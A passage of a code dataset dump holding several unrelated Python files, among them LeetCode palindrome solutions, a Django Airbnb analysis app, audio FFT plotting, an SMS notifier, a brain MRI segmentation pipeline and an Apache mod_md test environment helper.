100.0\nDEFAULT_BALL_ACCELERATION = 5\nDEFAULT_OBJECT_HP_COUNT = 2\nPLAYER_COLOR = (0, 255, 0)\nBALL_COLOR = (255, 255, 255)\nBALL_RADIUS = 10\nPLAYER_START_POSITION = (300, 550)\nPLAYER_SIZE = (200, 15)\nCOLOR_BLACK = (0, 0, 0)\nMAX_GAME_FPS = 60.0\nTARGETS_IN_ROW = 4\nNUMBER_OF_ROWS = 4\nPOINTS_FOR_BLOCK = 10\nNEW_BALL_SPAWN_ON_POINTS = 50\nMOVEMENT_AFTER_HIT = 6\nNEW_BALL_START_POINT = (720, 480)\n","sub_path":"ball bounce game/gameConfig.py","file_name":"gameConfig.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"537960643","text":"class Solution(object):\n def countSubstrings(self, S):#copy\n N = len(S)\n ans = 0\n for center in range(2*N - 1):\n left = center / 2 #0-【0,0】 1:[0,1]扩展 2-【1,1】 3-【1,2】\n right = left + center % 2 #left和right获取难点\n while left >= 0 and right < N and S[left] == S[right]:# 回文区间 `[a, b]`则[a+1,b-1]递归回文\n ans += 1\n left -= 1\n right += 1\n return ans\n#马拉车算法可以在线性时间内找出以任何位置为中心的最大回文串。\n\n#\nclass Solution(object):\n def countSubstrings(self, s):#copy\n dp=[[0]*len(s) for _ in range(len(s))]\n res=0\n for j in range(len(s)):\n for i in range(j+1):\n if s[i]==s[j] and (j-i<2 or dp[i+1][j-1]):\n dp[i][j]=1\n res+=1\n return res\n\n\n# 给你一个字符串 s ,请你统计并返回这个字符串中 回文子串 的数目。\n\n# 回文字符串 是正着读和倒过来读一样的字符串。\n\n# 子字符串 是字符串中的由连续字符组成的一个序列。\n\n# 具有不同开始位置或结束位置的子串,即使是由相同的字符组成,也会被视作不同的子串。\n\n# 来源:力扣(LeetCode)\n# 链接:https://leetcode.cn/problems/palindromic-substrings\n# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。","sub_path":"leetcode_solution/leetcode类别/10字符串/中等/5-647. 回文子串.py","file_name":"5-647. 回文子串.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"364750182","text":"import json\n\nfrom bokeh.embed import components\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.plotting import figure\nfrom bokeh.transform import jitter\nfrom django.shortcuts import render\nfrom airbnb_analysis.modeling import myWordCloud, embedding\nfrom geopy.geocoders import Nominatim\nimport joblib\nimport numpy as np\n\ndef index(request):\n return render(request, \"index.html\")\n\n\ndef map(request):\n # city = request.GET.get('city')\n # if city:\n data_path = './new_york.json'\n json_data = open(data_path)\n data = json.loads(json_data.read())\n ret = []\n for element in data:\n ret.append({'name': element['listing_name'],\n 'lat': element['lat'],\n 'lng': element['lng'],\n 'reviews': element['reviews_count'],\n 'prices': element['price']})\n json_data.close()\n data = json.dumps(ret)\n return render(request, \"home.html\", {'data': data})\n\n\ndef wordmap(request):\n city = request.GET.get('city')\n room_type = request.GET.get('room type')\n picture_src = None\n if city:\n data_path = './new_york.json'\n picture_src = myWordCloud.wordCloud(data_path, room_type)\n return render(request, \"wordcloud.html\", {'data':picture_src})\n\n\ndef prediction(request):\n address = request.GET.get('address')\n if address:\n name = request.GET.get('name')\n name_vec = embedding.name2Vec(name)\n geolocator = Nominatim(user_agent=\"airbnb analysis\")\n location = geolocator.geocode(address)\n min_nights = int(request.GET.get('min_nights'))\n max_nights = int(request.GET.get('max_nights'))\n price = int(request.GET.get('price'))\n person_capacity = int(request.GET.get('person_capacity'))\n bedrooms = int(request.GET.get('bedrooms'))\n bathrooms = int(request.GET.get('bathrooms'))\n can_instant_book = request.GET.get('can_instant_book') == '1'\n is_superhost = request.GET.get('is_superhost') == '1'\n room_type_category = request.GET.get('room_type_category')\n room_type_category_entire_home = int(room_type_category == '0')\n room_type_category_hotel_room = int(room_type_category == '1')\n room_type_category_private_room = int(room_type_category == '2')\n room_type_category_shared_room = int(room_type_category == '3')\n pipe = joblib.load('./airbnb_analysis/modeling/random_forest.joblib')\n pr_list = [location.latitude, location.longitude,\n min_nights, max_nights,\n price, person_capacity, bedrooms, bathrooms,\n can_instant_book, is_superhost] + list(name_vec) + \\\n [room_type_category_entire_home, room_type_category_hotel_room,\n room_type_category_private_room, room_type_category_shared_room]\n print(pr_list)\n pr_list = np.array(pr_list).reshape(1, -1)\n result = pipe.predict(pr_list)\n else:\n result = 'Please enter the information'\n return render(request, \"prediction.html\", {'result': result})\n\n\ndef analysis(request):\n feature_name = request.GET.get('feature')\n feature_names = [\"bedrooms\", \"bathrooms\", \"room_type_category\"]\n data_path = './new_york.json'\n json_data = open(data_path)\n data = json.loads(json_data.read())\n prices = []\n category = []\n if not feature_name:\n feature_name = 'bedrooms'\n for element in data:\n if element[feature_name] is not None:\n prices.append(element['price'])\n category.append(element[feature_name])\n json_data.close()\n data = {'prices': prices,\n 'category': category}\n source = ColumnDataSource(data=data)\n cats = list(set(category))\n cats = [str(c) for c in sorted(cats)]\n p = figure(plot_width=800, plot_height=800, y_range=cats,\n title=\"Rent by Category\")\n p.circle(x='prices', y=jitter('category', width=0.6, range=p.y_range), alpha=0.3, source=source)\n p.x_range.range_padding = 0\n p.ygrid.grid_line_color = None\n script, div = components(p)\n return render(request, \"analysis.html\", {'script': script, 'div': div, 'feature_names': feature_names,\n \"current_feature_name\": feature_name})\n","sub_path":"airbnb_analysis/airbnb_analysis/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"577255124","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.io import wavfile\nimport os\nimport math\n\nplt.style.use('seaborn')\nOUT_PATH = 'output'\n\nclass wavFile():\n\n '''\n Args:\n filename (str): name of .wav file to be loaded.\n '''\n\n def __init__(self, filename):\n self._rate, self._audio_data = wavfile.read(filename)\n self._n = len(self._audio_data)\n self.fft()\n\n def fft(self):\n self.modulus = abs(np.fft.rfft(self._audio_data) / self._n)\n self.argument = np.angle(np.fft.rfft(self._audio_data) / self._n)\n\n def plot_time(self, save_fname=None):\n time = np.arange(0, self._n)/self._rate\n\n plt.clf()\n plt.plot(time, self._audio_data)\n plt.title('Audio')\n plt.xlabel('Time [s]')\n if save_fname:\n plt.savefig(os.path.join(OUT_PATH, save_fname))\n print('Figure saved to {}'.format(os.path.join(OUT_PATH, save_fname)))\n plt.show()\n\n def plot_modulus(self, save_fname=None):\n freq = np.arange(self._n) * (self._rate / self._n)\n freq = freq[range(self._n // 2 + 1)]\n\n plt.clf()\n plt.plot(freq, self.modulus)\n plt.title('Modulus')\n plt.ylabel('Amplitude')\n plt.xlabel('Frequency [Hz]')\n if save_fname:\n plt.savefig(os.path.join(OUT_PATH, save_fname))\n print('Figure saved to {}'.format(os.path.join(OUT_PATH, save_fname)))\n plt.show()\n\n def plot_argument(self, save_fname=None):\n freq = np.arange(self._n) * (self._rate / self._n)\n freq = freq[range(self._n // 2 + 1)]\n\n plt.clf()\n plt.plot(freq[:50], self.argument[:50]/math.pi) # showing first 50 frequencies to have readable plot\n plt.title('Argument')\n plt.ylabel('Phase/π')\n plt.xlabel('Frequency [Hz]')\n if save_fname:\n plt.savefig(os.path.join(OUT_PATH, save_fname))\n print('Figure saved to {}'.format(os.path.join(OUT_PATH, save_fname)))\n plt.show()\n\n def save_file(self, save_fname):\n wavfile.write(os.path.join(OUT_PATH, save_fname), 44100, self._audio_data) #saving data with standard 44,1kHz\n print('Audio saved to {}'.format(os.path.join(OUT_PATH, save_fname)))\n\n @property\n def sample_rate(self):\n return self._rate\n\n @property\n def audio_data(self):\n return self._audio_data\n\n @audio_data.setter\n def audio_data(self, value):\n self._audio_data = value\n self.fft()\n","sub_path":"wavFile.py","file_name":"wavFile.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"646408350","text":"from core.advbase import *\n\ndef module():\n return Heinwald\n\nclass Heinwald(Adv):\n conf = {}\n conf['slots.a'] = [\n 'Resounding_Rendition',\n 'Flash_of_Genius',\n 'Howling_to_the_Heavens',\n 'The_Plaguebringer',\n 'A_Small_Courage'\n ]\n conf['acl'] = \"\"\"\n `dragon(c3-s-end),x=5\n queue prep and not buff(s3)\n `s3;s1;s4;s2\n end\n `s4\n `s1\n `s2, cancel\n \"\"\"\n conf['coabs'] = ['Blade','Wand','Bow']\n conf['share.base'] = ['Kleimann']\n conf['share.poison'] = ['Curran']\n\n\nif __name__ == '__main__':\n from core.simulate import test_with_argv\n test_with_argv(None, *sys.argv)\n","sub_path":"adv/heinwald.py","file_name":"heinwald.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"224276999","text":"import os\n\nfrom flask import render_template\n\nfrom libapp import app, dovesoft\nfrom libapp.config import smsconf\nfrom libapp.dovesoft.exceptions import DoveSoftClientError\n\nfrom .notifications import Notification\n\nds = dovesoft.DoveSoftClient(smsconf.USERNAME, smsconf.KEY)\n\n\nclass Sms(Notification):\n\n def __init__(self, **kwargs):\n super(Sms, self).__init__(**kwargs)\n\n def get_templates(self, template_name, **kwargs):\n \"\"\"\n Get text templates for sms\n \"\"\"\n text = render_template(\"{template}.txt\".format(template=template_name), **kwargs)\n return text\n\n def get_message(self, **kwargs):\n \"\"\"\n Get message object for sms\n \"\"\"\n message = dovesoft.Sms()\n\n for key in kwargs.keys():\n if key not in kwargs.get(\"ignore\", smsconf.IGNORE_KEYS):\n fun = getattr(message, \"set_{key}\".format(key=key))\n fun(kwargs.get(key, \"\"))\n\n return message\n\n def send_message(self, message):\n \"\"\"\n Send message to receiver via gateway\n \"\"\"\n try:\n resp = ds.send(message)\n app.logger.info(\"Successfully sent message: {msg}\".format(msg=resp))\n return resp\n except DoveSoftClientError as sgce:\n app.logger.error(\"Error while sending email: {msg}\".format(msg=resp))\n app.logger.error(\"Email: {message}\".format(message=message))\n raise DoveSoftClientError(sgce.code, sgce.read())\n\n def message_notifier(self, **kwargs):\n \"\"\"\n Message notifier helper to send message\n \"\"\"\n if all(key in kwargs for key in [\"msg_type\", \"author\", \"category\"]):\n template_name = os.path.join(kwargs.get(\"msg_type\", \"\"), kwargs.get(\"author\", \"\"),\n kwargs.get(\"category\", \"\"), kwargs.get(\"template\", \"\"))\n kwargs = self.del_keys(kwargs.get(\"delete\", smsconf.DELETE_KEYS), **kwargs)\n text = self.get_templates(template_name=template_name, **kwargs)\n message = self.get_message(message=text, **kwargs)\n resp = self.send_message(message)\n app.logger.info(\"{error} with {res}\".format(error=resp[0], res=str(resp[1]).strip(\"\\r\\n\").rstrip(\"\\n\\n\")))\n else:\n app.logger.error(\"No template data available: {data}\".format(data=kwargs.keys()))\n","sub_path":"libapp/notifications/sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"415630599","text":"__author__ = 'philipp.atorf'\nimport numpy as np\n\n\nclass cam_point_connection:\n \"\"\"\n\n :param camID:\n :param pointID:\n :param pos:\n \"\"\"\n\n def __init__(self, camID, pointID, pos=np.zeros([2, 1])):\n self.cam = camID\n \"\"\":type: int\"\"\"\n self.point_intern = pointID\n \"\"\":type: int\"\"\"\n self.pos = pos\n \"\"\":type: ndarray\"\"\"\n self.point_global = None\n \"\"\":type: int\"\"\"","sub_path":"cam_point_connection.py","file_name":"cam_point_connection.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"53623342","text":"import dynet as dy\nimport numbers\n\nimport xnmt.transducers.base as transducers_base\nimport xnmt.modelparts.decoders as decoders\nimport xnmt.transducers.recurrent as recurrent\nimport xnmt.expression_seqs as expr_seq\nimport xnmt.vocabs as vocabs\n\nfrom xnmt.rl.policy_action import PolicyAction\n\nclass SimultaneousState(decoders.AutoRegressiveDecoderState):\n \"\"\"\n The read/write state used to determine the state of the SimultaneousTranslator.\n \"\"\"\n def __init__(self,\n model,\n encoder_state: recurrent.UniLSTMState,\n decoder_state: decoders.AutoRegressiveDecoderState,\n has_been_read:int = 0,\n has_been_written:int = 0,\n written_word: numbers.Integral = None,\n policy_action: PolicyAction=None,\n reset_attender:bool = True,\n parent: 'SimultaneousState' = None):\n super().__init__(None, None)\n self.model = model\n self.encoder_state = encoder_state\n self.decoder_state = decoder_state\n self.has_been_read = has_been_read\n self.has_been_written = has_been_written\n self.written_word = written_word\n self.policy_action = policy_action\n self.reset_attender = reset_attender\n self.cache = {}\n self.parent = parent\n\n def read(self, src_encoding, policy_action):\n return SimultaneousState(self.model, src_encoding, self.decoder_state,\n has_been_read=self.has_been_read+1, has_been_written=self.has_been_written,\n written_word=self.written_word, policy_action=policy_action, reset_attender=True,\n parent=self)\n\n def write(self, src_encoding, word, policy_action):\n # Reset attender if there is a read action\n reset_attender = self.reset_attender\n if reset_attender:\n encodings = src_encoding[:self.has_been_read]\n self.model.attender.init_sent(expr_seq.ExpressionSequence(expr_list=encodings))\n reset_attender = False\n\n # Generating h_t based on RNN(h_{t-1}, embed(e_{t-1}))\n if self.decoder_state is None or word is None:\n dim = src_encoding[0].dim()\n fin_tran_state = [transducers_base.FinalTransducerState(dy.zeros(*dim), dy.zeros(*dim))]\n decoder_state = self.model.decoder.initial_state(fin_tran_state, vocabs.Vocab.SS)\n else:\n decoder_state = self.model.decoder.add_input(self.decoder_state, word)\n decoder_state.attention = self.model.attender.calc_attention(decoder_state.as_vector())\n decoder_state.context = self.model.attender.calc_context(decoder_state.as_vector(), decoder_state.attention)\n\n # Calc context for decoding\n return SimultaneousState(self.model, self.encoder_state, decoder_state,\n has_been_read=self.has_been_read, has_been_written=self.has_been_written+1,\n written_word=word, policy_action=policy_action, reset_attender=reset_attender,\n parent=self)\n\n def find_backward(self, field) -> list:\n now = self\n results = []\n while now.parent is not None:\n if field in now.cache:\n if len(results) == 0:\n results = now.cache[field]\n else:\n results.extend(now.cache[field])\n break\n else:\n result = getattr(now, field)\n if result is not None:\n results.append(result)\n now = now.parent\n self.cache[field] = results\n return self.cache[field]\n\n # These states are used for decoding\n @property\n def rnn_state(self):\n return self.decoder_state.rnn_state\n\n @property\n def context(self):\n return self.decoder_state.context\n\n def __repr__(self):\n content = self.policy_action.content if self.policy_action is not None else None\n return \"({}, {}, {})\".format(content, self.has_been_read, self.has_been_written)\n\n","sub_path":"xnmt/simultaneous/simult_state.py","file_name":"simult_state.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"78273991","text":"from xml.etree import ElementTree as ET\nimport json\nimport xlrd\n\n\ndef read_execl(excel_name):\n excel = xlrd.open_workbook(excel_name)\n excel_sheet = excel.sheet_by_name('student')\n data = {}\n for i in range(excel_sheet.nrows):\n data[(excel_sheet.row_values(i))[0]] = excel_sheet.row_values(i)[1:]\n\n return json.dumps(data, ensure_ascii=False)\n\n\ndef write_xml(data, xml_name):\n root = ET.Element('root')\n students = ET.SubElement(root, 'students')\n students.text = data\n students.append(ET.Comment(u\"\"\"学生信息表\"id\": [名字,数学,语文,英文]\"\"\"))\n\n students_xml = ET.ElementTree(root)\n students_xml.write(xml_name, xml_declaration=True, encoding='utf-8')\n\n\ncontent = read_execl('students.xls')\nwrite_xml(content, 'students.xml')\n","sub_path":"017/017.py","file_name":"017.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"157026801","text":"import tensorflow as tf\nimport numpy as np\nimport SimpleITK as sitk\nimport os\n\nfrom .conv_blocks import *\nfrom .losses import *\nfrom .utils import *\n\nfrom tensorflow.keras.mixed_precision import experimental as mixed_precision\npolicy = mixed_precision.Policy('mixed_float16')\nmixed_precision.set_policy(policy)\n\ndepth = 128 # 155\nheight = 192 # 240\nwidth = 160 # 240\nchannel_names = ['_t1.', '_t2.', '_t1ce.', '_flair.'] # do not change order\n# T1-weighted (T1), post-contrast T1-weighted (T1ce), T2-weighted (T2), and T2 Fluid Attenuated Inversion Recovery (FLAIR)\nout_channels = ['empty', 'ncr', 'ed', 'et']\n# necrotic and non-enhancing tumor core (NCR), peritumoral edema (ED), GD-enhancing tumor(ET)\n\n# ET : available\n# TC : ET + NCR\n# WT : ET + NCR + ED\n\n# model.save(\"model-best.h5\", include_optimizer=False)\n\nmodel = tf.keras.models.load_model(\"model-best.h5\", custom_objects={'ConvNorm': ConvNorm,\n 'NormAct': NormAct,\n 'AttnBottleneckBlock': AttnBottleneckBlock,\n 'BasicBlock': BasicBlock,\n 'InvertedResBlock': InvertedResBlock,\n 'SqueezeExcite': SqueezeExcite,\n 'MHSA3D': MHSA3D,\n 'AbsPosEmb': AbsPosEmb,\n 'dsc': dsc,\n 'FocalTversky': FocalTversky,\n 'CustomCLR': CustomCLR,\n }, compile=False)\n\ndef sort_path_list(path_list):\n ret = []\n for cnl in channel_names:\n for p in path_list:\n if cnl in os.path.split(p)[-1]:\n ret.append(p)\n path_list.remove(p)\n break\n else:\n print(f\"[!] Channel {cnl} not found.\")\n return ret\n\ndef read_img(path):\n img = sitk.GetArrayFromImage(sitk.ReadImage(path))\n img = tf.convert_to_tensor(img, dtype=tf.float32)\n scale = tf.reduce_max(img)/2\n img = (img/scale) - 1 # -1 to 1\n return tf.cast(img, tf.float32)\n\ndef load_img(path_list):\n assert len(path_list)==4, f\"There must be 4 channel paths, got {len(path_list)} instead.\"\n path_list = sort_path_list(path_list)\n img = tf.stack([read_img(path) for path in path_list])\n return img # [C, D, H, W]\n\ndef final_augmentation(imgs): # input imgs[B, 4, 155, 240, 240], output[B, 4, 128, 192, 160]\n imgs = center_crop3D(imgs)\n # imgs = tf.image.per_image_standardization(imgs) # source code checked, it's fine for 3D\n # imgs = (imgs - mean) / std\n return imgs\n\ndef center_crop3D(imgs, train=True): # Crops image to size (128, 192, 160)\n d_cr, h_cr, w_cr = 13, 24, 40\n imgs = imgs[:, :, d_cr:d_cr+depth, h_cr:h_cr+height, w_cr:w_cr+width]\n return imgs\n\ndef make_gif(img, pred, fname, alpha = 0.5): # [C, D, H, W]\n img = img * alpha\n img = np.stack((img,)*3, axis=-1)\n pred = pred.transpose(1,2,3,0) # [D, H, W, C]\n with imageio.get_writer(fname, mode='I', fps=10) as writer:\n p_images = (img + pred*(1-alpha)).astype(np.uint8)\n for i in p_images:\n writer.append_data(i)\n\ndef process_pipeline(paths, fname=\"out.gif\"):\n imgs = load_img(paths.copy())[None,:] # add batch dimension\n imgs = final_augmentation(imgs)\n preds = model(imgs)[0,1:]._numpy()\n img = imgs[0,1]._numpy()\n mn = img.min()\n mx = img.max()\n img = (img - mn)/(mx - mn) * 255\n make_gif(img, preds*255, fname=fname)","sub_path":"model/backend_brain_pipeline.py","file_name":"backend_brain_pipeline.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"365931604","text":"import time\nimport event_support.white_board\nfrom event import Event\n# for each new time period set a new value\nTOY_CASE_SPEED_UP = 3600\nUPDATE_TIME = 100\nprevious_ct_val = None\nEVENT_NAME_TIME_DAY = \"part_day\"\n\n\ndef get_time_from_midnight(time_sec):\n return (time_sec - time.replace(hour=0, minute=0, second=0, microsecond=0)).total_seconds()\n\n\ndef convert_to_ct_val(kelvin):\n return -kelvin * 0.05425 + 505.625\n\n\nnormal_case = {\n 0: convert_to_ct_val(2700),\n 8 * 3600: convert_to_ct_val(4000),\n 10 * 3600: convert_to_ct_val(6500),\n 16 * 3600: convert_to_ct_val(4000),\n 18 * 3600: convert_to_ct_val(2700)\n}\n\n\ndef find_range(array, value):\n prev_val = array[0]\n for i in range(1, len(array)):\n if (array[i] > value) and (prev_val > value):\n return prev_val, array[i]\n\n\nclass TimeOfTheDayEventGenerator:\n def __init__(self):\n self._previous_max_range = 0\n\n def on_timer(self, timestamp):\n (time1, time2) = find_range(normal_case)\n if time1 <= self._previous_max_range:\n return\n self._previous_max_range = time2\n\n event_support.white_board.add_event(Event(EVENT_NAME_TIME_DAY), [])\n","sub_path":"event_support/time_of_day_event.py","file_name":"time_of_day_event.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"458214806","text":"# test mod_md acme terms-of-service handling\n\nimport copy\nimport json\nimport pytest\nimport re\nimport os\nimport shutil\nimport socket\nimport subprocess\nimport sys\nimport time\nimport OpenSSL\n\nfrom datetime import datetime\nfrom datetime import tzinfo\nfrom datetime import timedelta\nfrom configparser import SafeConfigParser\nfrom shutil import copyfile\nfrom http.client import HTTPConnection\nfrom urllib.parse import urlparse\n\nSEC_PER_DAY = 24 * 60 * 60\n\nclass TestEnv:\n\n @classmethod\n def _init_base( cls ) :\n cls.ACME_URL = None\n cls.STORE_DIR = None\n\n cls.config = SafeConfigParser()\n cls.config.read('test.ini')\n cls.PREFIX = cls.config.get('global', 'prefix')\n\n cls.GEN_DIR = cls.config.get('global', 'gen_dir')\n\n cls.WEBROOT = cls.config.get('global', 'server_dir')\n cls.HOSTNAME = cls.config.get('global', 'server_name')\n cls.TESTROOT = os.path.join(cls.WEBROOT, '..', '..')\n \n cls.APACHECTL = os.path.join(cls.PREFIX, 'bin', 'apachectl')\n cls.APXS = os.path.join(cls.PREFIX, 'bin', 'apxs')\n cls.ERROR_LOG = os.path.join(cls.WEBROOT, \"logs\", \"error_log\")\n cls.APACHE_CONF_DIR = os.path.join(cls.WEBROOT, \"conf\")\n cls.APACHE_SSL_DIR = os.path.join(cls.APACHE_CONF_DIR, \"ssl\")\n cls.APACHE_CONF = os.path.join(cls.APACHE_CONF_DIR, \"httpd.conf\")\n cls.APACHE_TEST_CONF = os.path.join(cls.APACHE_CONF_DIR, \"test.conf\")\n cls.APACHE_CONF_SRC = \"data\"\n cls.APACHE_HTDOCS_DIR = os.path.join(cls.WEBROOT, \"htdocs\")\n\n cls.HTTP_PORT = cls.config.get('global', 'http_port')\n cls.HTTPS_PORT = cls.config.get('global', 'https_port')\n cls.HTTP_PROXY_PORT = cls.config.get('global', 'http_proxy_port')\n cls.HTTPD_HOST = \"localhost\"\n cls.HTTPD_URL = \"http://\" + cls.HTTPD_HOST + \":\" + cls.HTTP_PORT\n cls.HTTPD_URL_SSL = \"https://\" + cls.HTTPD_HOST + \":\" + cls.HTTPS_PORT\n cls.HTTPD_PROXY_URL = \"http://\" + cls.HTTPD_HOST + \":\" + cls.HTTP_PROXY_PORT\n cls.HTTPD_CHECK_URL = cls.HTTPD_PROXY_URL \n\n cls.A2MD = cls.config.get('global', 'a2md_bin')\n cls.CURL = cls.config.get('global', 'curl_bin')\n cls.OPENSSL = cls.config.get('global', 'openssl_bin')\n\n cls.MD_S_UNKNOWN = 0\n cls.MD_S_INCOMPLETE = 1\n cls.MD_S_COMPLETE = 2\n cls.MD_S_EXPIRED = 3\n cls.MD_S_ERROR = 4\n\n cls.EMPTY_JOUT = { 'status' : 0, 'output' : [] }\n\n cls.ACME_SERVER_DOWN = False\n cls.ACME_SERVER_OK = False\n\n cls.DOMAIN_SUFFIX = \"%d.org\" % time.time()\n\n cls.set_store_dir_default()\n cls.set_acme('acmev2')\n cls.clear_store()\n cls.install_test_conf()\n\n @classmethod\n def set_acme( cls, acme_section ) :\n cls.ACME_URL_DEFAULT = cls.config.get(acme_section, 'url_default')\n cls.ACME_URL = cls.config.get(acme_section, 'url')\n cls.ACME_TOS = cls.config.get(acme_section, 'tos')\n cls.ACME_TOS2 = cls.config.get(acme_section, 'tos2')\n cls.BOULDER_DIR = cls.config.get(acme_section, 'boulder_dir')\n if cls.STORE_DIR:\n cls.a2md_stdargs([cls.A2MD, \"-a\", cls.ACME_URL, \"-d\", cls.STORE_DIR, \"-j\" ])\n cls.a2md_rawargs([cls.A2MD, \"-a\", cls.ACME_URL, \"-d\", cls.STORE_DIR ])\n\n @classmethod\n def init( cls ) :\n cls._init_base()\n\n @classmethod\n def initv1( cls ) :\n cls._init_base()\n cls.set_acme('acmev1')\n\n @classmethod\n def initv2( cls ) :\n cls._init_base()\n\n @classmethod\n def set_store_dir( cls, dir ) :\n cls.STORE_DIR = os.path.join(cls.WEBROOT, dir)\n if cls.ACME_URL:\n cls.a2md_stdargs([cls.A2MD, \"-a\", cls.ACME_URL, \"-d\", cls.STORE_DIR, \"-j\" ])\n cls.a2md_rawargs([cls.A2MD, \"-a\", cls.ACME_URL, \"-d\", cls.STORE_DIR ])\n\n @classmethod\n def set_store_dir_default( cls ) :\n dir = \"md\"\n if cls.httpd_is_at_least(\"2.5.0\"):\n dir = os.path.join(\"state\", dir)\n cls.set_store_dir(dir)\n\n @classmethod\n def get_method_domain( cls, method ) :\n return \"%s-%s\" % (re.sub(r'[_]', '-', method.__name__.lower()), TestEnv.DOMAIN_SUFFIX)\n\n @classmethod\n def get_module_domain( cls, module ) :\n return \"%s-%s\" % (re.sub(r'[_]', '-', module.__name__.lower()), TestEnv.DOMAIN_SUFFIX)\n\n @classmethod\n def get_class_domain( cls, c ) :\n return \"%s-%s\" % (re.sub(r'[_]', '-', c.__name__.lower()), TestEnv.DOMAIN_SUFFIX)\n\n # --------- cmd execution ---------\n\n _a2md_args = []\n _a2md_args_raw = []\n \n @classmethod\n def run( cls, args, input=None ) :\n p = subprocess.run(args, capture_output=True, text=True)\n try:\n jout = json.loads(p.stdout)\n except:\n jout = None\n print(\"stderr: \", p.stderr)\n print(\"stdout: \", p.stdout)\n return { \n \"rv\": p.returncode, \n \"stdout\": p.stdout, \n \"stderr\": p.stderr,\n \"jout\" : jout \n }\n\n @classmethod\n def a2md_stdargs( cls, args ) :\n cls._a2md_args = [] + args \n\n @classmethod\n def a2md_rawargs( cls, args ) :\n cls._a2md_args_raw = [] + args\n \n @classmethod\n def a2md( cls, args, raw=False ) :\n preargs = cls._a2md_args\n if raw :\n preargs = cls._a2md_args_raw\n return cls.run( preargs + args )\n\n @classmethod\n def curl( cls, args ) :\n return cls.run( [ cls.CURL ] + args )\n\n # --------- HTTP ---------\n\n @classmethod\n def is_live( cls, url, timeout ) :\n server = urlparse(url)\n try_until = time.time() + timeout\n print(\"checking reachability of %s\" % url)\n while time.time() < try_until:\n try:\n c = HTTPConnection(server.hostname, server.port, timeout=timeout)\n c.request('HEAD', server.path)\n resp = c.getresponse()\n c.close()\n return True\n except ConnectionRefusedError:\n print(\"connection refused\")\n time.sleep(.1)\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n time.sleep(.1)\n print(\"Unable to contact server after %d sec\" % timeout)\n return False\n\n @classmethod\n def is_dead( cls, url, timeout ) :\n server = urlparse(url)\n try_until = time.time() + timeout\n print(\"checking reachability of %s\" % url)\n while time.time() < try_until:\n try:\n c = HTTPConnection(server.hostname, server.port, timeout=timeout)\n c.request('HEAD', server.path)\n resp = c.getresponse()\n c.close()\n time.sleep(.1)\n except IOError:\n return True\n except:\n return True\n print(\"Server still responding after %d sec\" % timeout)\n return False\n\n @classmethod\n def get_json( cls, url, timeout ) :\n data = cls.get_plain( url, timeout )\n if data:\n return json.loads(data)\n return None\n\n @classmethod\n def get_plain( cls, url, timeout ) :\n server = urlparse(url)\n try_until = time.time() + timeout\n while time.time() < try_until:\n try:\n c = HTTPConnection(server.hostname, server.port, timeout=timeout)\n c.request('GET', server.path)\n resp = c.getresponse()\n data = resp.read()\n c.close()\n return data\n except IOError:\n print(\"connect error:\", sys.exc_info()[0])\n time.sleep(.1)\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n print(\"Unable to contact server after %d sec\" % timeout)\n return None\n\n @classmethod\n def check_acme( cls ) :\n if cls.ACME_SERVER_OK:\n return True\n if cls.ACME_SERVER_DOWN:\n pytest.skip(msg=\"ACME server not running\")\n return False\n if cls.is_live(cls.ACME_URL, 0.5):\n cls.ACME_SERVER_OK = True\n return True\n else:\n cls.ACME_SERVER_DOWN = True\n pytest.fail(msg=\"ACME server not running\", pytrace=False)\n return False\n\n @classmethod\n def get_httpd_version( cls ) :\n p = subprocess.run([ cls.APXS, \"-q\", \"HTTPD_VERSION\" ], capture_output=True, text=True)\n if p.returncode != 0:\n return \"unknown\"\n return p.stdout.strip()\n \n @classmethod\n def _versiontuple( cls, v ):\n return tuple(map(int, v.split('.')))\n \n @classmethod\n def httpd_is_at_least( cls, minv ) :\n hv = cls._versiontuple(cls.get_httpd_version())\n return hv >= cls._versiontuple(minv)\n\n # --------- access local store ---------\n\n @classmethod\n def purge_store( cls ) : \n print(\"purge store dir: %s\" % TestEnv.STORE_DIR)\n assert len(TestEnv.STORE_DIR) > 1\n if os.path.exists(TestEnv.STORE_DIR):\n shutil.rmtree(TestEnv.STORE_DIR, ignore_errors=False)\n os.makedirs(TestEnv.STORE_DIR)\n\n @classmethod\n def clear_store( cls ) : \n print(\"clear store dir: %s\" % TestEnv.STORE_DIR)\n assert len(TestEnv.STORE_DIR) > 1\n if not os.path.exists(TestEnv.STORE_DIR):\n os.makedirs(TestEnv.STORE_DIR)\n for dir in [ \"challenges\", \"tmp\", \"archive\", \"domains\", \"accounts\", \"staging\", \"ocsp\" ]:\n shutil.rmtree(os.path.join(TestEnv.STORE_DIR, dir), ignore_errors=True)\n\n @classmethod\n def clear_ocsp_store( cls ) : \n assert len(TestEnv.STORE_DIR) > 1\n dir = 